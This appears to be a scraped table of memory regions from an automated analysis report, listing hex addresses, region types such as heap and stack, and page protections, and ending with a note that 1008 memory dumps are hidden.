||
6309000
|
heap
|
page read and write
|
||
77E1000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
35F0000
|
heap
|
page read and write
|
||
AC80000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
79CE000
|
stack
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
766D000
|
stack
|
page read and write
|
||
63C2000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
3089000
|
heap
|
page read and write
|
||
7846000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
29C3000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
AD34000
|
heap
|
page read and write
|
||
AD38000
|
heap
|
page read and write
|
||
77B6000
|
heap
|
page read and write
|
||
6225000
|
trusted library allocation
|
page read and write
|
||
4E71000
|
trusted library allocation
|
page read and write
|
||
AC6F000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
5561000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
2A55000
|
heap
|
page read and write
|
||
AD64000
|
heap
|
page read and write
|
||
ABB5000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
2930000
|
heap
|
page read and write
|
||
AD2F000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
71E0000
|
trusted library allocation
|
page read and write
|
||
660C000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6307000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
ABB7000
|
heap
|
page read and write
|
||
6302000
|
heap
|
page read and write
|
||
ABB0000
|
heap
|
page read and write
|
||
291E000
|
stack
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
ABB8000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7E1D000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AC81000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AD59000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
50E3000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
79BD000
|
stack
|
page read and write
|
||
791D000
|
stack
|
page read and write
|
||
29DB000
|
heap
|
page read and write
|
||
798E000
|
stack
|
page read and write
|
||
3365000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
88B6000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
546A000
|
trusted library allocation
|
page read and write
|
||
29BE000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
325C000
|
stack
|
page read and write
|
||
ACFA000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
8EAC000
|
stack
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
4D79000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
4D90000
|
trusted library allocation
|
page read and write
|
||
8A11000
|
trusted library allocation
|
page read and write
|
||
7B10000
|
heap
|
page read and write
|
||
AC75000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
2935000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
ABB3000
|
heap
|
page read and write
|
||
ABB2000
|
heap
|
page read and write
|
||
4D92000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7570000
|
trusted library section
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
7AA0000
|
trusted library allocation
|
page read and write
|
||
6308000
|
heap
|
page read and write
|
||
8A90000
|
heap
|
page read and write
|
||
4FAE000
|
stack
|
page read and write
|
||
85F0000
|
trusted library allocation
|
page read and write
|
||
ABBB000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
ABB9000
|
heap
|
page read and write
|
||
5380000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
ADFC000
|
heap
|
page read and write
|
||
49F7000
|
heap
|
page read and write
|
||
EB7D000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7210000
|
trusted library allocation
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
AC63000
|
heap
|
page read and write
|
||
ABBD000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
AF7F000
|
heap
|
page read and write
|
||
2920000
|
heap
|
page read and write
|
||
AC81000
|
heap
|
page read and write
|
||
6467000
|
trusted library allocation
|
page read and write
|
||
ACD7000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
7595000
|
heap
|
page execute and read and write
|
||
6303000
|
heap
|
page read and write
|
||
4CE0000
|
heap
|
page read and write
|
||
AD67000
|
heap
|
page read and write
|
||
7890000
|
trusted library allocation
|
page read and write
|
||
25BB000
|
stack
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AE2B000
|
heap
|
page read and write
|
||
ABB5000
|
heap
|
page read and write
|
||
4DEE000
|
stack
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
2990000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
ABB1000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
7A96000
|
heap
|
page read and write
|
||
71EA000
|
trusted library allocation
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page read and write
|
||
5388000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
8600000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
ABB0000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
87CE000
|
stack
|
page read and write
|
||
6308000
|
heap
|
page read and write
|
||
4F10000
|
trusted library allocation
|
page read and write
|
||
743E000
|
stack
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
7AE0000
|
trusted library allocation
|
page read and write
|
||
CB0C000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
33B4000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
4F0E000
|
stack
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
77C6000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
630D000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
533E000
|
stack
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
4EAD000
|
trusted library allocation
|
page read and write
|
||
AD04000
|
heap
|
page read and write
|
||
4D64000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
ACF5000
|
heap
|
page read and write
|
||
A7B1000
|
heap
|
page read and write
|
||
EB8C000
|
trusted library allocation
|
page read and write
|
||
4D50000
|
trusted library allocation
|
page read and write
|
||
315E000
|
stack
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
4E6D000
|
trusted library allocation
|
page read and write
|
||
AD7E000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7EA0000
|
trusted library allocation
|
page read and write
|
||
ABB4000
|
heap
|
page read and write
|
||
AD9F000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
7A50000
|
trusted library allocation
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
4E60000
|
trusted library allocation
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
AC60000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
7770000
|
heap
|
page read and write
|
||
2A2F000
|
heap
|
page read and write
|
||
7B80000
|
trusted library allocation
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
A7B1000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
ABBA000
|
heap
|
page read and write
|
||
6310000
|
heap
|
page read and write
|
||
AC8C000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
7A70000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
7B27000
|
heap
|
page read and write
|
||
6305000
|
heap
|
page read and write
|
||
6309000
|
heap
|
page read and write
|
||
6303000
|
heap
|
page read and write
|
||
60A6000
|
trusted library allocation
|
page read and write
|
||
AC76000
|
heap
|
page read and write
|
||
4F0F000
|
trusted library allocation
|
page read and write
|
||
35EE000
|
stack
|
page read and write
|
||
4D63000
|
trusted library allocation
|
page execute and read and write
|
There are 1008 hidden memdumps, click here to show them.